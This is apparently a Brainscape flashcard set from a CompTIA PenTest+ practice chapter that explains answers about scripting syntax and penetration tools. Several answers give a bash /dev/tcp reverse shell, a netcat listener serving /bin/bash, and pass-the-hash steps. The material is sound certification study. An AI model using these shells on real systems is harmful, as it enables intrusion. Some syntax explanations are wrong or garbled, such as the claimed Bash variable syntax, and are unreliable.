A

C.Impacket

Explanation:
The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Answer 89

A

A.Metasploit Framework

Explanation:
The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.

Answer 90

A

B.Bash
D.Python

Explanation:
When declaring a variable, both Bash and Python use the same syntax: variable_name = value

Answer 91

A

A.PowerShell
C.Ruby

Explanation:
When declaring a variable, PowerShell uses a syntax of $variable_name = value.
Ruby uses the same syntax when declaring a global variable.

Answer 92

A

C.Ruby

Explanation:
When declaring a local variable, Ruby uses a syntax of _variable_name = value.

Answer 93

A

C.Ruby
D.Python

Explanation:
When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, …].

Answer 94

A

B.Bash

Explanation:
When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, …).

Answer 95

A

A.PowerShell

Explanation:
When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, …).

Answer 96

A

B.Bash

Explanation:
When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

Answer 97

A

B.Bash

Explanation:
When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this
example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 98

A

A.PowerShell

Explanation:
When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 99

A

D.Python

Explanation:
When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray

Answer 100

A

C.Ruby

Explanation:
When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

Answer 101

A

A.Target[HostName] = FS1

Explanation:
When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value.
In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

Answer 102

A

D._Target = {“HostName” => “FS1”}

Explanation:
When creating an associative array in a Ruby script, you use the following syntax: _array_name = {“element_name” => “value”} . In this example, the line _Target = {“HostName” => “FS1”} assigns a value of FS1 to the element named HostName within the Target array.

Answer 103

A

C.$Target.HostName = ‘FS1’

Explanation:
When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = “value” . In this example, the line $Target.HostName = ‘FS1’ assigns a value of FS1 to the element named HostName within the Target array.

Answer 104

A

B.Target = [{“HostName”:”FS1”}]

Explanation:
When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{“element_name”:”value”}].

In this example, the line Target = [{“HostName”:”FS1”}] assigns a value of FS1 to the element named HostName within the Target array.

Answer 105

A

B.==

Explanation:
When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

Answer 106

A

A.<>
D.!=

Explanation:
When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.

Answer 107

A

B.==

Explanation:
When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

Answer 108

A

C.-eq

Explanation:
When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

Answer 109

A

C.-gt

Explanation:
When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

Answer 110

A

A.>

Explanation:
The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Answer 111

A

C.-ge

Explanation:
The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Answer 112

A

B.-gt

Explanation:
The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Answer 113

A

A.>=

Explanation:
The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Answer 114

A

B.-lt

Explanation:
The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Answer 115

A

D.<

Explanation:
The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Answer 116

A

C.-le

Explanation:
The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Answer 117

A

A.<=

Explanation:
The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Answer 118

A

B.read TargetHost

Explanation:
Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 119

A

A.echo $TargetHost

Explanation:
Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

Answer 120

A

C.test

Explanation:
The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Answer 121

A

A.Ruby

Explanation:
An if/then flow control structure in Ruby uses the following syntax: if condition commands… else commands… end

Answer 122

A

B.PowerShell

Explanation:

An if/then flow control structure in PowerShell uses the following syntax:

if condition {
commands…
} Else { commands…
}

Answer 123

A

C.Bash

Explanation:
An if/then flow control structure in Bash uses the following syntax:

if condition then
   commands...
 else
   commands... 
fi

Answer 124

A

E.case

Explanation:
The case structure is the best option presented to evaluate the user’s choice of multiple selections and run the appropriate set of commands as a result.

Answer 125

A

A.while loop

Explanation:
A while loop will keep processing over and over until the specified condition evaluates to false.

Answer 126

A

D.if/then/else

Explanation:
The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Answer 127

A

C.until loop

Explanation:
The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Answer 128

A

B.for loop

Explanation:
The for looping structure will process a specified number of times.

Answer 129

A

D.$TargetHost = read-host -Prompt

Explanation:
Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 130

A

A.echo $TargetHost

Explanation:
Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Answer 131

A

C.TargetHost = gets

Explanation:
Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 132

A

D.puts TargetHost

Explanation:
Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 133

A

A.TargetHost = input(‘Please enter a hostname:’)

Explanation:
Adding the TargetHost = input(‘Please enter a hostname:’) line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 134

A

B.print (TargetHost)

Explanation:
Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 135

A

B.#!/bin/bash

Explanation:
The #!/bin/bash element must be included at the beginning of every Bash shell script.

Answer 136

A

A.Enter /bin/bash ~/myexploit at the shell prompt.
E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.

Explanation:
E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.

Answer 137

A

B.declare –i TOTAL

Explanation:
The declare –i TOTAL command will create the TOTAL variable and type it as integer.

Answer 138

A

C.tail /var/log/firewall 1> lastevents 2> &1

Explanation:
Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a bash script will send both stdout and stout and stderr to the same file

Answer 139

A

D.Responder

Explanation:
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network.

Responder is a powerful tool when exploiting NetBIOS responses.

It can target individual systems or entire local networks, allows you to ananlyze or response to NetBIOS name services pretending to be the system that the query is intended forD

Answer 140

A

C.Maltego
E.Shodan

Explanation:
There are a variety of tools that assist with this OSINT collection:

Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine

Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.

Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.

nslookup tools help identify the IP addresses associated with an organization.

Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.

Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.

Answer 141

A

B.Hydra

Explanation:
In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 142

A

C.Pass the hash

Explanation:
In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network.

Answer 143

A

C.msfconsole

Explanation:
Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory

Answer 144

A

B.Mimikatz

Explanation:
Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 145

A

A.bash -i >& /dev/tcp//443 0>&1

Explanation:
A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: bash -i >& /dev/tcp//443 0>&1 Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.

Answer 146

A

A.A port scan has been performed.

Explanation:
In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP
connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i invokes an interactive bash shell. > &/dev/tcp// pipes that shell to the tester. 0&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).

Answer 147

A

C.Hydra

Explanation:
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Answer 148

A

A.Browser Exploitation Framework (BeEF)

Explanation:
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 149

A

A.CeWL

Explanation:
Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 150

A

A.It executes a remote script.

Explanation:
In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Answer 151

A

A.The organization did not disable Telnet.

Explanation:
Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Answer 152

A

C.TCP SYNs to TCP port 80

Explanation:
Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 153

A

A.nc -lp 4444 -e /bin/bash

Explanation:
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

Answer 154

A

A.-p- 1-65535

Explanation:
nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 155

A

D.Shodan

Explanation:
Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 156

A

D.Secure Shell (SSH)
F.Wireshark

Explanation:
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22,
and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Answer 157

A

B.Remove let in front of dest=5+5
C.Change the = to -eq

Explanation:
Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 158

A

A.$ports = 20, 25, 80, 443

Explanation:
PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 159

A

A.nc -nvlp 443

Explanation:
The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 160

A

D.Responder

Explanation:
In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 161

A

A.-iL
F.-sV

Explanation:
One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version info.

Answer 162

A

D.use auxiliary/server/socks4a

Explanation:
Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

Answer 163

A

A.Impacket

Explanation:
Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 164

A

B.1,000

Explanation:
Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.

Answer 165

A

B.1

Explanation:
In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.

Answer 166

A

B.Shodan

Explanation:
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 167

A

A.Censys

Explanation:
Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 168

A

C.Sqlmap

Explanation:
Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Brainscape's Knowledge GenomeTM

CompTIA PenTest+ Practice Test Chapter 4 Penetration Testing Tools (Sybex: Panek, Crystal, Tracy) Flashcards

Brainscape's Knowledge Genome^TM